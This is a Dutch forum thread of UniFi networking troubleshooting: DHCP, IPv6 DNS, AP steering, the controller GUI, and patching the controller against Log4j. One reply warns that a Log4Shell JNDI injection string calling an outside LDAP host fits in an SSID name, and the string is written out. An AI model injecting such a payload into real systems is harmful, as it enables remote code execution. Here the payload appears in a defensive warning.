NopeTonne schreef op donderdag 9 december 2021 @ 19:38:
[...]
[...]
Je hebt niet toevallig een aantal Sonossen bedraad in je netwerk?
@hostifi_net op twitter. Ik zie trouwens dat het 5.76.6 is dat ze adviseren om te installeren.Timmert schreef op donderdag 9 december 2021 @ 22:04:
[...]
Even benieuwd; waar post Hostifi die wijsheid over updates?
Voor de controller zeggen ze bijv momenteel 6.4.54. 6.5.53 testen ze nog.
Toch denk ik dat het ergens een probleem is in je settings. Want de dhcp problemen met apple zijn met de nieuwste stabiele versies echt verleden tijd. Dat maakt het probleem niet minder voor jou. Maar geeft misschien wel een richting om te zoeken.
Ik heb sinds ik mijn netwerk uitgebreid heb met een Inwall-HD meldingen van mijn Inwall-HD en Nano-HD.
"... having trouble acquiring an IP address"
Ik had de accespoints beide een vast ip adres gegeven dus dit weer op DHCP gezet maar de melding blijft terugkomen.
Is dit op te lossen of kan ik dit laten voor wat het is?
Ik heb onderstaande setup:
USG
Switch 8-60W
USW Flex Mini
Nano-HD
Inwall-HD
Cloudkey 2
"... having trouble acquiring an IP address"
Ik had de accespoints beide een vast ip adres gegeven dus dit weer op DHCP gezet maar de melding blijft terugkomen.
Is dit op te lossen of kan ik dit laten voor wat het is?
Ik heb onderstaande setup:
USG
Switch 8-60W
USW Flex Mini
Nano-HD
Inwall-HD
Cloudkey 2
Toevallig loop ik nu ook tegen ook met dhcp problemen aan die elkaar ook steeds krijg ( meerdere devices zijn dan gewoon even hun ip adress kwijt. Blijk dat dit best vaak gebeurt sinds ik hier push notificatie heb hangen.Tonne schreef op vrijdag 10 december 2021 @ 08:15:
[...]
Toch denk ik dat het ergens een probleem is in je settings. Want de dhcp problemen met apple zijn met de nieuwste stabiele versies echt verleden tijd. Dat maakt het probleem niet minder voor jou. Maar geeft misschien wel een richting om te zoeken.
[ Voor 8% gewijzigd door xbeam op 10-12-2021 18:57 ]
Lesdictische is mijn hash#
Ik hoop dat iemand mij van advies kan voorzien bij de volgende situatie:
Ik heb een setup met o.a. de USG firewall router en een Switch 8 60W, maar nu is mijn thuisnetwerk harder gegroeid dan ik had voorzien en heb ik geen poorten meer beschikbaar (terwijl ik nog wel een AP wil aansluiten). In de toekomst verwacht ik nog wel wat poorten nodig te hebben (wellicht voor PoE camera).
Kan ik in deze situatie het beste een grotere switch kopen (en de oude verkopen), of een tweede Switch 8 ernaast zetten (en zo ja, hoe werkt dat dan)?
Alvast bedankt!
Ik heb een setup met o.a. de USG firewall router en een Switch 8 60W, maar nu is mijn thuisnetwerk harder gegroeid dan ik had voorzien en heb ik geen poorten meer beschikbaar (terwijl ik nog wel een AP wil aansluiten). In de toekomst verwacht ik nog wel wat poorten nodig te hebben (wellicht voor PoE camera).
Kan ik in deze situatie het beste een grotere switch kopen (en de oude verkopen), of een tweede Switch 8 ernaast zetten (en zo ja, hoe werkt dat dan)?
Alvast bedankt!
Het kan allemaal en is volledig afhankelijk van je budget. Een gulden regel is om wat meer capaciteit in te slaan dan je nu strict nodig hebt. Een 2e switch sluit je simpelweg aan op de 1e waardoor je 2 poorten in het geheel verliest alleen vanwege die koppeling.Bussy_B schreef op vrijdag 10 december 2021 @ 10:25:
Ik hoop dat iemand mij van advies kan voorzien bij de volgende situatie:
Ik heb een setup met o.a. de USG firewall router en een Switch 8 60W, maar nu is mijn thuisnetwerk harder gegroeid dan ik had voorzien en heb ik geen poorten meer beschikbaar (terwijl ik nog wel een AP wil aansluiten). In de toekomst verwacht ik nog wel wat poorten nodig te hebben (wellicht voor PoE camera).
Kan ik in deze situatie het beste een grotere switch kopen (en de oude verkopen), of een tweede Switch 8 ernaast zetten (en zo ja, hoe werkt dat dan)?
Alvast bedankt!
"We're not computers, Sebastian. We're physical."
IPv6 vraagje
Ik heb in mijn UDM-Pro opgegeven onder IPv6 dat deze 2001:4860:4860::8888 en 2001:4860:4860::8844 moet gebruiken bij een DHCP lease richting de client. Nu is het zo dat ik wel een IPv6 adres krijg van Unifi maar mijn Ipv6 adres van de UDM-Pro als DNS server zie staan
Hebben meer mensen dit? en iemand een tip hoe dit te verhelpen?
Ik heb in mijn UDM-Pro opgegeven onder IPv6 dat deze 2001:4860:4860::8888 en 2001:4860:4860::8844 moet gebruiken bij een DHCP lease richting de client. Nu is het zo dat ik wel een IPv6 adres krijg van Unifi maar mijn Ipv6 adres van de UDM-Pro als DNS server zie staan
Hebben meer mensen dit? en iemand een tip hoe dit te verhelpen?
Cloud ☁️
Ook dns aanpassen in je dhcpv6HKLM_ schreef op vrijdag 10 december 2021 @ 16:26:
IPv6 vraagje![]()
Ik heb in mijn UDM-Pro opgegeven onder IPv6 dat deze 2001:4860:4860::8888 en 2001:4860:4860::8844 moet gebruiken bij een DHCP lease richting de client. Nu is het zo dat ik wel een IPv6 adres krijg van Unifi maar mijn Ipv6 adres van de UDM-Pro als DNS server zie staan![]()
Hebben meer mensen dit? en iemand een tip hoe dit te verhelpen?
/f/image/xtNa7lkdrzLkkwhpz237C26c.png?f=fotoalbum_large)
[ Voor 25% gewijzigd door Tylen op 10-12-2021 16:36 ]
“Choose a job you love, and you will never have to work a day in your life.”
Ja daar staan ze waar dacht jij dan?Tylen schreef op vrijdag 10 december 2021 @ 16:34:
[...]
Ook dns aanpassen in je dhcpv6
[Afbeelding]
Cloud ☁️
Wat wil je dan precies? Zet daar je juiste dnsv6 server neer die je wilt gebruiken. En dan ipconfig /renew6
“Choose a job you love, and you will never have to work a day in your life.”
Ja en dat werkt dus nietTylen schreef op vrijdag 10 december 2021 @ 16:41:
[...]
Wat wil je dan precies? Zet daar je juiste dnsv6 server neer die je wilt gebruiken. En dan ipconfig /renew6
Cloud ☁️
Ah ok. Nee hier werkt het wel goed.HKLM_ schreef op vrijdag 10 december 2021 @ 16:42:
[...]
Ja en dat werkt dus nietik blijf mijn UDM ipv6 als dns krijgen.
“Choose a job you love, and you will never have to work a day in your life.”
Wat is er mis met de DNS servers die je al vanuit je ipv4 lease hebt?
[ Voor 3% gewijzigd door lolgast op 10-12-2021 17:00 ]
Daar is niks mis meelolgast schreef op vrijdag 10 december 2021 @ 17:00:
Wat is er mis met de DHCP servers die je al vanuit je ipv4 lease hebt?
Cloud ☁️
ja wilde ik ook, tot mijn prefix wijzigde en de PiHole wel een nieuw adres kreeg maar de vast ingestelde DNS server niet gewijzigd werd (natuurlijk niet)...HKLM_ schreef op vrijdag 10 december 2021 @ 17:00:
[...]
Daar is niks mis meealleen ik wil de full package
Dan maar enkel DNS via IPv4 (er komen toch wel IPv6 adressen terug)...
[ Voor 9% gewijzigd door darkrain op 10-12-2021 18:27 ]
Apart. Ik draai gewoon mixxed mode zonder issues met custom dns servers. (Load balancers op de Citrix ADC)HKLM_ schreef op vrijdag 10 december 2021 @ 19:45:
[...]
Na moet iets rots zijn in mijn bestaande wifi netwerk profile. Zo juist een nieuw netwerk aangemaakt en daar gaat het wel goed![]()
Heb nu een IPv6 only wifi netwerk gemaakt haha![]()
[Afbeelding]
/f/image/YHh9FBkWmiGnTZAjtR0wNzM7.png?f=fotoalbum_large)
“Choose a job you love, and you will never have to work a day in your life.”
Binnenkort even de controller updaten i.v.m. een exploit in log4j:
https://community.ui.com/...bb-4979-8b10-99db36ddabe1
https://community.ui.com/...bb-4979-8b10-99db36ddabe1
- nero355
- Registratie: Februari 2002
- Laatst online: 28-02 22:21
ph34r my [WCG] Cows :P
- Netwerk switches
- Ubiquiti Unifi Dream Machine Special Edition
- Ubiquiti UniFi Dream Machine SE
- Ubiquiti UniFi
- Unifi
- Amplifi
- Accesspoints
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti UniFi AC In-Wall Pro
- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti EdgeRouter Infinity
- Netwerkaccessoires
- Ubiquiti
- Amplifi High Density WiFi System (2 mesh points)
- Netwerkapparatuur
- Modems en routers
:strip_exif()/u/49248/DPCkoeienUD.gif?f=community)
Zag ook net de e-mail daarvan en heel eerlijk gezegd denk ik dat het vooral belangrijk is voor de gebruikers van een Guest WiFi Portal die vanaf de UniFi Controller wordt geserveerdRudolfR schreef op vrijdag 10 december 2021 @ 21:05:
Binnenkort even de controller updaten i.v.m. een exploit in log4j:
https://community.ui.com/...bb-4979-8b10-99db36ddabe1
Zie ook : https://community.ui.com/...aa-42ce-9580-c0a7d91c4b89
En : https://www.lunasec.io/docs/blog/log4j-zero-day/
* nero355 heeft stiekem helemaal geen zin in de nieuwe GUI en nieuwere UniFi Controller versies dan 5.14.23 dus elk excuus om het niet te doen is er weer één!
/EDIT :
Als dat een dingetje wordt in de toekomst dan heb ik liever geen IPv6darkrain schreef op vrijdag 10 december 2021 @ 18:26:
ja wilde ik ook, tot mijn prefix wijzigde

Maar misschien ben ik teveel verwend door KPN in het verleden die gewoon zei :
En KLAAR!!!Jouw klantnummer : 1234567890
Het bijbehorende IP adres : xxx.xxx.xxx.xxx
Ondertussen zag ik al die Chello/UPC/Ziggo klanten constant klooien met een ander adres om de zoveel tijd! LOL!

Misschien als workaround dan maar de Link-Local adressen voor zulke dingen gebruikenen de PiHole wel een nieuw adres kreeg maar de vast ingestelde DNS server niet gewijzigd werd (natuurlijk niet)...
Dan maar enkel DNS via IPv4 (er komen toch wel IPv6 adressen terug)...
[ Voor 32% gewijzigd door nero355 op 11-12-2021 00:46 ]
|| Stem op mooiere Topic Search linkjes! :) " || Pi-Hole : Geen advertenties meer voor je hele netwerk! >:) ||
- RobertMe
- Registratie: Maart 2009
- Laatst online: 22:28
- Unifi
- Ubiquiti UniFi
- Ubiquiti
- Amplifi
- Netwerkaccessoires
- Netwerkapparatuur
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti EdgeRouter Infinity
- Ubiquiti UniFi AC In-Wall Pro
- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti UniFi nanoHD
- Netwerk switches
- Amplifi High Density WiFi System (2 mesh points)
- Ubiquiti Cloud Gateway Max
- Modems en routers
- Accesspoints
- Ubiquiti UniFi AP-AC LITE
- Ubiquiti UniFi AP AC PRO
Wat ik mij zo kan herinneren van Essent@home => @home => Ziggo is dat het IP adres zeeeer zelden wijzigd, zolang je geen andere router aansluit. Toevallig dat het begin dit jaar of vorig jaar "spontaan" is veranderd (van 84.... naar 217....) maar denk dat ik verder misschien al 10 jaar hetzelfde had / dat alleen wijzigde bij het plaatsen van een nieuwe router. Een router die ik jaren niet gebruikt had heb ik zelfs nog eens een keer ergens anders aangesloten en die kreeg zelfs toen weer hetzelfde IP adres als wat die bij mij had. Dat bij Ziggo het IP adres continu verandere valt dus wel mee in mijn ervaring.nero355 schreef op zaterdag 11 december 2021 @ 00:37:
Ondertussen zag ik al die Chello/UPC/Ziggo klanten constant klooien met een ander adres om de zoveel tijd! LOL!![]()
![]()
@nero355 Hoe vaak gebruik je de GUI dan dat je er zo’n haat voor hebt? Het enige dat ik in de GUI doe is soms een IP-/MAC-adres opzoeken, maar ik ga niet voor mijn plezier minuten lang naar de topologie of grafiekjes kijken? ‘Alles’ (beperkingen van Ubiquiti daargelaten) zit toch inmiddels in v6?
Vwb je IPv6 prefix opmerking: Bij Mikrotik kun je ook een zogeheten prefix-hint meegeven waardoor mijn adres tot dusver altijd hetzelfde is gebleven
Vwb je IPv6 prefix opmerking: Bij Mikrotik kun je ook een zogeheten prefix-hint meegeven waardoor mijn adres tot dusver altijd hetzelfde is gebleven
Een prefix hint is alleen maar om de onderhandeling voor de lengte van het prefix goed te laten verlopen. De DUID van je dhcp client is in dat geval een stuk belangrijker.lolgast schreef op zaterdag 11 december 2021 @ 08:41:
@nero355 Hoe vaak gebruik je de GUI dan dat je er zo’n haat voor hebt? Het enige dat ik in de GUI doe is soms een IP-/MAC-adres opzoeken, maar ik ga niet voor mijn plezier minuten lang naar de topologie of grafiekjes kijken? ‘Alles’ (beperkingen van Ubiquiti daargelaten) zit toch inmiddels in v6?
Vwb je IPv6 prefix opmerking: Bij Mikrotik kun je ook een zogeheten prefix-hint meegeven waardoor mijn adres tot dusver altijd hetzelfde is gebleven
Overigens heb ik bij Ziggo ook al 7 jaar hetzelfde IP. Vooral door het gebruik van hetzelfde WAN MAC.
[ Voor 6% gewijzigd door ed1703 op 11-12-2021 09:09 ]
Ach zo vaak verandert die prefix nou ook weer nietnero355 schreef op zaterdag 11 december 2021 @ 00:37:
Ondertussen zag ik al die Chello/UPC/Ziggo klanten constant klooien met een ander adres om de zoveel tijd! LOL!![]()
![]()
[...]
Misschien als workaround dan maar de Link-Local adressen voor zulke dingen gebruiken
Link-Local werkt bij mij niet (niet ingedoken waarom niet)... Maar goed enkel via IPv4 naar PiHole heeft ook als voordeel dat je dashboard niet vol komt te staan met IPv6 adressen die je niet kan terugbrengen naar clients (komt door privacy extensions)...
Link-Local adressen zijn ook exact dat, local. Als je om wat voor reden dan ook een intern ipv6 subnet wilt gebruiken moet je een fc00::/7 gebruiken, wat in de praktijk altijd een fd00::/8 wordt. Die worden enkel intern gerouteerd en zijn daarmee niet van buitenaf beinvloedbaardarkrain schreef op zaterdag 11 december 2021 @ 10:28:
[...]
Ach zo vaak verandert die prefix nou ook weer niet
Link-Local werkt bij mij niet (niet ingedoken waarom niet)... Maar goed enkel via IPv4 naar PiHole heeft ook als voordeel dat je dashboard niet vol komt te staan met IPv6 adressen die je niet kan terugbrengen naar clients (komt door privacy extensions)...
Kende jullie de tip al om de displays van de switches uit te schakelen? Dit is een per device instelling, je zet de night time op 23uren en 59minuten.
:fill(white):strip_exif()/f/image/NnbgQn9VwXfUhZBKlXIsOyVI.png?f=user_large)
In de app zie ik t wel voor de UDM Pro :sypie schreef op zaterdag 11 december 2021 @ 15:38:
Ik zie die specifieke optie niet staan op de USG Pro of de USW 16 PoE.
/f/image/ngNuZ4Go7Re2yB4ERI00umqH.png?f=fotoalbum_large)
Owner of DBIT Consultancy | DJ BassBrewer
Je zou zeggen dat de controller bepaald welke cliënt op welk AP wordt aangesloten.
Client op drie meter in line of sight van AP, blijft heel stug verbinden met een AP die veel verder ligt en achter twee muren. En dan de melding erbij dat het geen optimale verbinding is....
Reconnect etc blijft stug terugkoppelen naar het AP dat ik niet wil hebben.
Tot zover de reden om er een controller achter te hangen
Standaard instellingen overigens, geen rare fratsen uitgehaald.
Client op drie meter in line of sight van AP, blijft heel stug verbinden met een AP die veel verder ligt en achter twee muren. En dan de melding erbij dat het geen optimale verbinding is....
Reconnect etc blijft stug terugkoppelen naar het AP dat ik niet wil hebben.
Tot zover de reden om er een controller achter te hangen

Standaard instellingen overigens, geen rare fratsen uitgehaald.
Waiting on the world to change
@pinda powerrr Het is niet de controller die dat bepaalt, het is onder andere het zendvermogen en de overlap van de AP's die dat bepaalt.
Vaak helpt het om hetzendvermogen van de AP's naar beneden te zetten zodat de overlap minder groot is waardoor er eerder overgegaan wordt naar een andere AP.
Vaak helpt het om hetzendvermogen van de AP's naar beneden te zetten zodat de overlap minder groot is waardoor er eerder overgegaan wordt naar een andere AP.
Er zijn echt wel meer manieren om dit te exploiteren. Elk pad waarbij je een bericht in de controller forceert ('duplicate BSSID gezien') kan dit potentieel veroorzaken.nero355 schreef op zaterdag 11 december 2021 @ 00:37:
[...]
Zag ook net de e-mail daarvan en heel eerlijk gezegd denk ik dat het vooral belangrijk is voor de gebruikers van een Guest WiFi Portal die vanaf de UniFi Controller wordt geserveerd
Zie ook : https://community.ui.com/...aa-42ce-9580-c0a7d91c4b89
En : https://www.lunasec.io/docs/blog/log4j-zero-day/
En ${jndi:ldap://host.io/a} past in een SSID naam
Dat snap ik, vandaar dat het zendvermogen van het AP dat véél verder staat, ook gewoon maar "zachtjes" staat. AP dichtbij staat ook zacht, juist om de overlap te minimaliseren.sypie schreef op zaterdag 11 december 2021 @ 16:21:
@pinda powerrr Het is niet de controller die dat bepaalt, het is onder andere het zendvermogen en de overlap van de AP's die dat bepaalt.
Vaak helpt het om hetzendvermogen van de AP's naar beneden te zetten zodat de overlap minder groot is waardoor er eerder overgegaan wordt naar een andere AP.
Dat maakt het nog wat frustrerender.
De cliënt is een vast apparaat welke dus niet van zijn plek komt. Maar staat wel aangegeven in de Unifi app als apparaat met een hele slechte verbinding.
Waiting on the world to change
- nero355
- Registratie: Februari 2002
- Laatst online: 28-02 22:21
ph34r my [WCG] Cows :P
- Netwerk switches
- Ubiquiti Unifi Dream Machine Special Edition
- Ubiquiti UniFi Dream Machine SE
- Ubiquiti UniFi
- Unifi
- Amplifi
- Accesspoints
- Ubiquiti UniFi AC HD
- Ubiquiti EdgeRouter Lite 3-Poort Router
- Ubiquiti EdgeRouter X
- Ubiquiti UniFi AC In-Wall
- Ubiquiti UniFi AC In-Wall Pro
- Amplifi High Density WiFi Router
- Ubiquiti EdgePoint Router
- Ubiquiti EdgeRouter Infinity
- Netwerkaccessoires
- Ubiquiti
- Amplifi High Density WiFi System (2 mesh points)
- Netwerkapparatuur
- Modems en routers
:strip_exif()/u/49248/DPCkoeienUD.gif?f=community)
Daar gaat het niet omlolgast schreef op zaterdag 11 december 2021 @ 08:41:
Hoe vaak gebruik je de GUI dan dat je er zo’n haat voor hebt?
Ik vind het gewoon een domme onnodige redesign en ik ben daar echt niet de enige in!
Een hoop dingen krijgen een andere plek en je zoekt je rot naar instellingen die in het verleden veel makkelijker te vinden waren...

Om over het switchen tussen de nieuwe en oude GUI voor sommige instellingen maar niet te beginnen!
Dat doe ik dan ook niet, maar er is ook zoiets als een voorkeur hebben qua tools/GUI's waarmee je werkt hé!Het enige dat ik in de GUI doe is soms een IP-/MAC-adres opzoeken, maar ik ga niet voor mijn plezier minuten lang naar de topologie of grafiekjes kijken?
Volgens mij was er laatst nog het een ander meerdere keren erbij gekomen om vervolgens weer permanent te verdwijnen!‘Alles’ (beperkingen van Ubiquiti daargelaten) zit toch inmiddels in v6?
Prefix Length != SubnetVwb je IPv6 prefix opmerking: Bij Mikrotik kun je ook een zogeheten prefix-hint meegeven waardoor mijn adres tot dusver altijd hetzelfde is gebleven
Laten we het hopen...darkrain schreef op zaterdag 11 december 2021 @ 10:28:
Ach zo vaak verandert die prefix nou ook weer niet
Dat lijkt me best wel raar en is zeker iets om effe goed uit te zoeken!Link-Local werkt bij mij niet (niet ingedoken waarom niet)...
Zulke Clients zou ik gewoon van mijn netwerk weren!Maar goed enkel via IPv4 naar PiHole heeft ook als voordeel dat je dashboard niet vol komt te staan met IPv6 adressen die je niet kan terugbrengen naar clients (komt door privacy extensions)...
Was al bekend, maar volgens mij niet bekend genoeg dus wel een mooie tip!stormfly schreef op zaterdag 11 december 2021 @ 15:31:
Kende jullie de tip al om de displays van de switches uit te schakelen? Dit is een per device instelling, je zet de night time op 23uren en 59minuten.
[Afbeelding]
Hmm... crap... daar zeg je wat!ANdrode schreef op zaterdag 11 december 2021 @ 16:56:
Er zijn echt wel meer manieren om dit te exploiteren. Elk pad waarbij je een bericht in de controller forceert ('duplicate BSSID gezien') kan dit potentieel veroorzaken.
En ${jndi:ldap://host.io/a} past in een SSID naam

Alleen hele dure Cisco/HPE/enz. modellenpinda powerrr schreef op zaterdag 11 december 2021 @ 16:10:
Je zou zeggen dat de controller bepaald welke cliënt op welk AP wordt aangesloten.
Client op drie meter in line of sight van AP, blijft heel stug verbinden met een AP die veel verder ligt en achter twee muren. En dan de melding erbij dat het geen optimale verbinding is....
Reconnect etc blijft stug terugkoppelen naar het AP dat ik niet wil hebben.
Tot zover de reden om er een controller achter te hangen![]()
Standaard instellingen overigens, geen rare fratsen uitgehaald.
Begin eens met :pinda powerrr schreef op zaterdag 11 december 2021 @ 17:15:
Dat snap ik, vandaar dat het zendvermogen van het AP dat véél verder staat, ook gewoon maar "zachtjes" staat. AP dichtbij staat ook zacht, juist om de overlap te minimaliseren.
Dat maakt het nog wat frustrerender.
2.4 GHz @ Low
5 GHz @ High
"And take it from there..."
- Heb je de optie om een BSSID op te geven ??De cliënt is een vast apparaat welke dus niet van zijn plek komt.
Maar staat wel aangegeven in de Unifi app als apparaat met een hele slechte verbinding.
- Waarom is dat gekke ding eigenlijk niet gewoon via UTP aangesloten
|| Stem op mooiere Topic Search linkjes! :) " || Pi-Hole : Geen advertenties meer voor je hele netwerk! >:) ||
In recente versies van de controller is er de mogelijkheid een client aan een bepaald AP "vast te knopen".pinda powerrr schreef op zaterdag 11 december 2021 @ 17:15:
[...]
De cliënt is een vast apparaat welke dus niet van zijn plek komt. Maar staat wel aangegeven in de Unifi app als apparaat met een hele slechte verbinding.
Ik maak daar dankbaar gebruik van om o.a. een Nest-hub en een printer aan één van mijn AP's te hangen.
In de client list, de gewenste client selecteren, en via Settings instellen.
:no_upscale():strip_icc():fill(white):strip_exif()/f/image/1pCZ1gKq3rTt95Mbg9BgsCBe.jpg?f=user_large)
[ Voor 6% gewijzigd door Masimo op 11-12-2021 20:02 ]
Dagelijks meerdere keren per dag. Even wat wijzigen of de firewall corrigeren/ inrichten vanwege een wijziging bij klanten is zo frustrerend wie bedenkt het om bij opslaan van regels niet gewoon naar de firewall regeloverzicht terug te gaan maar naar het voor liggen tab blad. Dagelijks regel maken is ramp. Daarbij is het bij het maken van deze regel steeds weer goed kijken of het juiste uitschuifvelt open hebt staan en zoek naar functie die niet zichtbaar zijn omdat ze onlogisch in een ander openklap menu zittenlolgast schreef op zaterdag 11 december 2021 @ 08:41:
@nero355 Hoe vaak gebruik je de GUI dan dat je er zo’n haat voor hebt? Het enige dat ik in de GUI doe is soms een IP-/MAC-adres opzoeken, maar ik ga niet voor mijn plezier minuten lang naar de topologie of grafiekjes kijken? ‘Alles’ (beperkingen van Ubiquiti daargelaten) zit toch inmiddels in v6?
Vwb je IPv6 prefix opmerking: Bij Mikrotik kun je ook een zogeheten prefix-hint meegeven waardoor mijn adres tot dusver altijd hetzelfde is gebleven
Momenteel is het waardeloos. Een van de redenen waarom ik mensen die (web/software) designe steeds is minder mag is om de meeste designers stuk gaan openvouwen schermpjes en het creëren van niet noodzakelijke handelingen waarvan ze denken dan past het mooi in een scherm dat voorkomt scrollen

[ Voor 13% gewijzigd door xbeam op 11-12-2021 21:52 ]
Lesdictische is mijn hash#
Dat aanpassen van de firewall regels is eigenlijk wel mijn grootste ergernis aan die hele nieuwe GUIxbeam schreef op zaterdag 11 december 2021 @ 20:39:
[...]
Dagelijks meerdere keren per dag. Even wat wijzigen en de firewall corrigeren/ inrichten vanwege een wijziging is zo frustrerend wie benut het om bij opslaan van regel niet gewoon naar de firewall regels te gaan maar het voor liggen tab blad dagelijks regel maken is ramp. Daarbij is maken van deze regel steeds weer goed kijken of het juiste uitschuifvelt open staat anders zoek naar functie die niet zichtbaar zijn omdat onlogisch in open klap menu zitten
Momenteel is het waardeloos. Een van de redenen waarom technische mensen en (web/software) designers niet samen gaan is om dat de meeste designers stuk gaan openvouwen schermpje om en creëren van niet noodzakelijke handelingen de denken dan pst het mooi in scherm want scrollen is lastig
Cloud ☁️
@xbeam Als je dagelijks zaken in de firewall aanpast kan ik je een device aanbevelen dat geen provision hoeft te doen, maar waarbij de wijziging gewoon instant is. Wat een verademing
Nu versnel ik het actief worden van de regels door er standaard een snippit achter aan te gooien.lolgast schreef op zaterdag 11 december 2021 @ 20:54:
@xbeam Als je dagelijks zaken in de firewall aanpast kan ik je een device aanbevelen dat geen provision hoeft te doen, maar waarbij de wijziging gewoon instant is. Wat een verademing
code:
1
| clear connection-trackin |
[ Voor 9% gewijzigd door xbeam op 11-12-2021 21:47 ]
Lesdictische is mijn hash#
Had ik gedaan met de tv in de woonkamer. Lock to AP..... Nee hoor, de grote Sony Bravia wil graag met een ander AP verbinden en doet dat dan stug ook.Masimo schreef op zaterdag 11 december 2021 @ 20:01:
[...]
In recente versies van de controller is er de mogelijkheid een client aan een bepaald AP "vast te knopen".
Ik maak daar dankbaar gebruik van om o.a. een Nest-hub en een printer aan één van mijn AP's te hangen.
In de client list, de gewenste client selecteren, en via Settings instellen.
[Afbeelding]
Het andere apparaat welke niet wilde verbinden is een Ziggo Next decoder. Daar doe ik maar geen uitspraken over verder
Instellingen doe ik nu remote, want niet bij mij thuis.
Waiting on the world to change
Geef je na dat soort wijzigingen de betreffende devices ook wel een reconnect in de controlller?pinda powerrr schreef op zaterdag 11 december 2021 @ 22:46:
[...]
Had ik gedaan met de tv in de woonkamer. Lock to AP..... Nee hoor, de grote Sony Bravia wil graag met een ander AP verbinden en doet dat dan stug ook.
Het andere apparaat welke niet wilde verbinden is een Ziggo Next decoder. Daar doe ik maar geen uitspraken over verder![]()
Instellingen doe ik nu remote, want niet bij mij thuis.
Soms hebben ze net even dat duwtje nog nodig.
[ Voor 0% gewijzigd door Behoorlijk Leek op 11-12-2021 22:56 . Reden: typo ]
Kan je eigenlijk de volgorde van de kolommen met de gegevens van de clients aanpassen? Google kon niet helpen.
Dit is hetgeen je inderdaad even kan doen. Heeft bij mij gewerkt. Nu hebben alle AP's weer een mooie"score" ...(OCD...I know )Behoorlijk Leek schreef op zaterdag 11 december 2021 @ 22:55:
[...]
Geef je na dat soort wijzigingen de betreffende devices ook wel een reconnect in de controlller?
Soms hebben ze net even dat duwtje nog nodig.
Blijkbaar is de Unifi Network Application vatbaar voor het log4shell security lek.
Versie 6.5.54 zou deze vulnerabilitie patchen.
Dus tenzij je cryptominers of ransomware naar je systemen wil doorkrijgen : best patchen ( en vingers kruisen in de hoop dat je systeem na de patch nog goed werkt !
)
*edit * Op het eerste zicht nog niet echt problemen met de versie update : https://community.ui.com/...bb-4979-8b10-99db36ddabe1
Versie 6.5.54 zou deze vulnerabilitie patchen.
Dus tenzij je cryptominers of ransomware naar je systemen wil doorkrijgen : best patchen ( en vingers kruisen in de hoop dat je systeem na de patch nog goed werkt !
*edit * Op het eerste zicht nog niet echt problemen met de versie update : https://community.ui.com/...bb-4979-8b10-99db36ddabe1
[ Voor 23% gewijzigd door Falcon10 op 13-12-2021 08:36 ]
-| Hit it i would ! |-
Net geüpdate. Ging soepel.
Ik zal het melden als ik problemen tegenkom.
Ik zal het melden als ik problemen tegenkom.
Be small, act BIG.
Hoe realistisch is jouw scenario voor de huis, tuin en keukengebruikers als je je controller alleen lokaal draait en dus zonder remote toegang?Falcon10 schreef op maandag 13 december 2021 @ 08:33:
Blijkbaar is de Unifi Network Application vatbaar voor het log4shell security lek.
Versie 6.5.54 zou deze vulnerabilitie patchen.
Dus tenzij je cryptominers of ransomware naar je systemen wil doorkrijgen : best patchen ( en vingers kruisen in de hoop dat je systeem na de patch nog goed werkt !)
*edit * Op het eerste zicht nog niet echt problemen met de versie update : https://community.ui.com/...bb-4979-8b10-99db36ddabe1
Ik heb nu ook een USG draaien (yay).
Nu had ik in mijn vorige setup (OpenWRT) allemaal DHCP entries vastgezet en kon ik deze allemaal netjes vinden op Hostname.
Nu probeer ik datzelfde te bereiken met de USG, maar dat is toch iets lastiger, ik heb e.e.a. al in de Clients gezet met een vast IP adres.
Situatieschets:
Server draait Docker met een aantal containers, zoals bv Homeassistant. Deze hoort bereikbaar te zijn op homeassistant.home.
Docker is opgezet met MACVlan, dus alle containers hebben een MAC Adres en IP, ivm PiHole (draait in een container en op een Pi)
Deze pingen vanaf een laptop of de USG zelf werkt niet.
In OpenWRT had ik dergelijke entries:
Nu zijn er, voor zover ik kan zien, een aantal opties om dit op de "juiste" manier in te richten:
Iemand hier wat advies voor?
Nu had ik in mijn vorige setup (OpenWRT) allemaal DHCP entries vastgezet en kon ik deze allemaal netjes vinden op Hostname.
Nu probeer ik datzelfde te bereiken met de USG, maar dat is toch iets lastiger, ik heb e.e.a. al in de Clients gezet met een vast IP adres.
Situatieschets:
Server draait Docker met een aantal containers, zoals bv Homeassistant. Deze hoort bereikbaar te zijn op homeassistant.home.
Docker is opgezet met MACVlan, dus alle containers hebben een MAC Adres en IP, ivm PiHole (draait in een container en op een Pi)
Deze pingen vanaf een laptop of de USG zelf werkt niet.
In OpenWRT had ik dergelijke entries:
code:
1
2
3
4
5
| config host option name 'PiHole' option mac '02:42:AC:11:20:11' option ip '192.168.2.11' option dns '1' |
Nu zijn er, voor zover ik kan zien, een aantal opties om dit op de "juiste" manier in te richten:
- Hosts in de /etc/hosts van de USG zetten
- De /etc/dnsmasq.d/dnsmasq.static.conf van de USG aanmaken en aanpassen
- Alles via PiHole/Unbound laten lopen?
Iemand hier wat advies voor?
Optie 2 is de makkelijkste maar gaat wel verloren bij een update van de firmware was mijn ervaring toenBen.Hahlen schreef op maandag 13 december 2021 @ 11:00:
Ik heb nu ook een USG draaien (yay).
Nu had ik in mijn vorige setup (OpenWRT) allemaal DHCP entries vastgezet en kon ik deze allemaal netjes vinden op Hostname.
Nu probeer ik datzelfde te bereiken met de USG, maar dat is toch iets lastiger, ik heb e.e.a. al in de Clients gezet met een vast IP adres.
Situatieschets:
Server draait Docker met een aantal containers, zoals bv Homeassistant. Deze hoort bereikbaar te zijn op homeassistant.home.
Docker is opgezet met MACVlan, dus alle containers hebben een MAC Adres en IP, ivm PiHole (draait in een container en op een Pi)
Deze pingen vanaf een laptop of de USG zelf werkt niet.
In OpenWRT had ik dergelijke entries:
code:
1 2 3 4 5 config host option name 'PiHole' option mac '02:42:AC:11:20:11' option ip '192.168.2.11' option dns '1'
Nu zijn er, voor zover ik kan zien, een aantal opties om dit op de "juiste" manier in te richten:De makkelijkste optie lijkt mij optie 2, de meest "robuuste" waarschijnlijk optie 3 (want ik zou dan unbound gebruiken ook op de Pi, dus als de Docker variant down gaat (om wat voor reden dan ook) heb ik altijd de back up nog)?
